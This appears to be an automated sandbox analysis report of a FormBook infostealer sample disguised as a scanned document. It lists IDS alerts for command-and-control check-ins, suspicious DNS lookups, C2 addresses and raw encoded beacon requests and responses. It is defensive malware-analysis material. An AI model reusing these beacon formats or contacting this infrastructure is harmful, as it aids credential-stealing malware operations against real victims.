Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60438 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60442 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60442 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60443 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60215 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60455 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60445 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60453 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60446 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60446 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60447 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60449 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60456 -> 103.174.136.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60448 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60437 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60450 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60450 -> 38.22.89.164:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60436 -> 45.130.41.107:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60441 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60451 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60440 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:60452 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:60454 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:60454 -> 68.65.122.71:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.sesanu.xyz
Source:	DNS query: www.tabyscooterrentals.xyz

Source: global traffic

TCP traffic: 192.168.2.8:60140 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 199.192.21.169 199.192.21.169
Source: Joe Sandbox View	IP Address: 15.197.240.20 15.197.240.20
Source: Joe Sandbox View	IP Address: 15.197.240.20 15.197.240.20

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0088CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0088CE44

Source: global traffic	HTTP traffic detected: GET /ti8p/?O2ePNNH0=MUDy3YqvL7nJjo7YRvEpL0En2kkl+QSwWlXAA27uESbLrWvg6NI8OA30BxzMmM43Wrbxd+OWoV3ymKsjfu3GM0IEaVa0LxZz/bb5MfRF8Y3qAd/qgVlf6CSQekqVEk5sbw==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.biocaracol.onlineConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /ajra/?O2ePNNH0=2p4airO795Dn7gjP+jvTybwKdYuaf9hxn45z7/EQvQ5Z540aLfhYPACGMudBmeh/HdMergqqhhWIcIC0VgXLt1dK3H8aNuBfPvyb8EJGClNEbPXCYZb+xDZ5J+2PL+Z5SA==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.zucchini.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /q1v9/?O2ePNNH0=metx3mUju98G7hAfRriWQtmXkGN9W+/XJmBU5YhJIGTDaOPtkjQkc7gqohOsrca8eeiGHEfgIoNXOYbhhBmf7QiThxgVyK6NCTKme3kYRuxLt+QsgneNlbuT0nXrlnHVaA==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.ogbos88.cyouConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /u8xw/?O2ePNNH0=i8gXCJLEz0m1jkVF91XubMUJuq2NwOyQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL/uh8mRcEHcFuW3RH1uzlL0AosO+KRcAyFW3Nm3vkB9lzg==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.esscosaathi.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /y3ui/?O2ePNNH0=D47F9HanQoviz06wAFaQpWJrQYA3sEREFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexSvKA2orqVGmRjW2S5mzIhwaahGiWa+bKDQAY6jSvIIBuw==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.myfastuploader.sbsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /mjs1/?O2ePNNH0=GVh/hhHQVOm9lJhitzwoqNkD8zboxSkQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4yZhvM15q69RepVJzrWBIP8UGaM9HjMvRNhgw0A0DI7CbA==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /rf25/?O2ePNNH0=7K/WA23tcmDFyzNMGH/quV9PRW4j8/nmQwJwfw98BfkTBnsrTY46HewHDC14kj2B/CLZPuq7EXqCGidtAJMC1hsIoixanfRydq2t2v9Un+mneZn3egUEahovskKrleZAWw==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sesanu.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /vwha/?56-H=2t2xuzpX2&O2ePNNH0=+1TlPe1iHurJgrUo1Fh4jMYCUgN6dLJjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEjTjVAEexEL7h/EXKKKoC/rP/dgEVjb+3KEnGAuUy2xLnw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sovz.proConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /l5cx/?O2ePNNH0=yQJKkfxWdg40vhwKwT0yo2Rd/5PUpL2s8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQagN3QWVkeUo3Ve4Asu3MWt+IqOvzDkO73IjfDsXnTMMww==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.tabyscooterrentals.xyzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /gott/?O2ePNNH0=6kpJ6LpNwGTQjQFv9wT0vKrg7LyU1Ky+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhoeiV8r7Y+8cTGMdsaGZVrW7s+26pDLbmq8chOO3l2d4Xg==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.sql.danceConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /ucix/?O2ePNNH0=PvAg9QCS6Z5JTHKcjy7JUmQHcUGckiODdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOLFU2gGDn9aYvOg0rFqJEB5O9KgryNVgV9zNl1vTlYWlaw==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.811371bb10.buzzConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Source: global traffic	HTTP traffic detected: GET /csd1/?O2ePNNH0=0h3WwWevRNaqBPz4X21Ll2QLu9yBncRH4GvN+jOYSYvv/wPW0ZZUjDEdN12hCkheLADdXdQ+boBHPC0vEe57Vgc9vjW+03TEJsYMyVopgf5EyZ5UePzu/SZcWe82Of3NdA==&56-H=2t2xuzpX2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.rtp189z.latConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)

Source: global traffic	DNS traffic detected: DNS query: www.biocaracol.online
Source: global traffic	DNS traffic detected: DNS query: www.zucchini.pro
Source: global traffic	DNS traffic detected: DNS query: www.yacolca.digital
Source: global traffic	DNS traffic detected: DNS query: www.ogbos88.cyou
Source: global traffic	DNS traffic detected: DNS query: www.esscosaathi.info
Source: global traffic	DNS traffic detected: DNS query: www.myfastuploader.sbs
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats
Source: global traffic	DNS traffic detected: DNS query: www.sesanu.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sovz.pro
Source: global traffic	DNS traffic detected: DNS query: www.tabyscooterrentals.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sql.dance
Source: global traffic	DNS traffic detected: DNS query: www.811371bb10.buzz
Source: global traffic	DNS traffic detected: DNS query: www.rtp189z.lat
Source: global traffic	DNS traffic detected: DNS query: www.glyttera.shop
Source: global traffic	DNS traffic detected: DNS query: www.usps-infora.top
Source: global traffic	DNS traffic detected: DNS query: www.u75lmwdgp0du.homes

Source: unknown

HTTP traffic detected: POST /ajra/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Host: www.zucchini.proOrigin: http://www.zucchini.proReferer: http://www.zucchini.pro/ajra/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 209Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)Data Raw: 4f 32 65 50 4e 4e 48 30 3d 37 72 51 36 68 65 48 42 38 34 54 63 7a 69 32 76 32 54 58 78 67 4c 67 45 56 4b 66 4c 63 4d 49 54 78 70 46 74 6b 63 4d 30 6e 52 64 47 38 71 6b 67 45 61 4e 39 56 42 43 36 44 4f 56 37 69 65 64 65 50 73 77 4a 36 77 71 7a 31 68 36 33 64 4d 76 30 52 43 69 32 76 47 6f 75 6f 6d 51 57 5a 64 45 76 48 4d 7a 4a 2f 68 38 62 48 78 59 39 42 50 48 50 55 50 2f 30 33 6e 74 33 51 70 48 53 4d 39 52 79 4e 31 79 2f 70 32 62 6e 59 4c 62 50 66 6d 63 68 55 77 4e 38 37 35 56 43 68 70 42 65 67 59 39 62 33 36 7a 4c 65 4e 38 7a 73 6e 74 68 38 77 46 55 4b 7a 39 72 58 50 41 37 75 4f 37 72 52 68 2b 7a 47 76 65 2f 4f 65 41 3d Data Ascii: O2ePNNH0=7rQ6heHB84Tczi2v2TXxgLgEVKfLcMITxpFtkcM0nRdG8qkgEaN9VBC6DOV7iedePswJ6wqz1h63dMv0RCi2vGouomQWZdEvHMzJ/h8bHxY9BPHPUP/03nt3QpHSM9RyN1y/p2bnYLbPfmchUwN875VChpBegY9b36zLeN8zsnth8wFUKz9rXPA7uO7rRh+zGve/OeA=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Mon, 06 Jan 2025 15:02:38 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:03:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3SlmGBXOWSy%2Br0cjcj1bgGJiJ2dJCTLb8L%2BVrTl5ukPQJND%2FPA65VzWX1WUCFUahiG99EIJ4iWnZTAlXtKa9%2FVVOxTdH1Nd%2B%2FoYjoiJgo5F4joBR8C1uNAvb2nc9GYp66D%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fdc99043b83437a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=12379&min_rtt=12379&rtt_var=6189&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:03:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKBYc%2FeGg%2BbVDLbiNNL%2FVoEP9%2FxFGa41Oyb3C7%2BfqedE3UaSqpjVM1WnpKJwS%2B%2F1p1dksidfLpGJHdLnvxNYV8Y8EpFIe%2FwFaC9yr4J2m4WaVgKiDjPTfsbTEoZAq%2Fqh8Rp8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fdc99143d715e73-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0J1lHsiHsSPxXAsTP3bQrtkNWLYto9nguX7eEzsvHJ5oSYHMPe4SPwXvXy2bpD4qXhJgUERZlpPp0vKM5W0ygV8xAjknQSrwSXP7kmKf1ninbuy%2BUPVjpj0Ndl7btrJCns2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fdc99243fce42cc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xLPVvF3zvD5lRTMkpHq97njE%2BSvaA1BWtSvRB3jPjXLMdKkSqkcd3ts%2B2CfQ1%2FhgEuUnryCuUXtNUlfh9dsjV04%2BL7ifgqzN2f0PsWkJl3Fnf753fdRZLtu5Us5ZjUrMIeaz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fdc99342e0715cb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=479&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 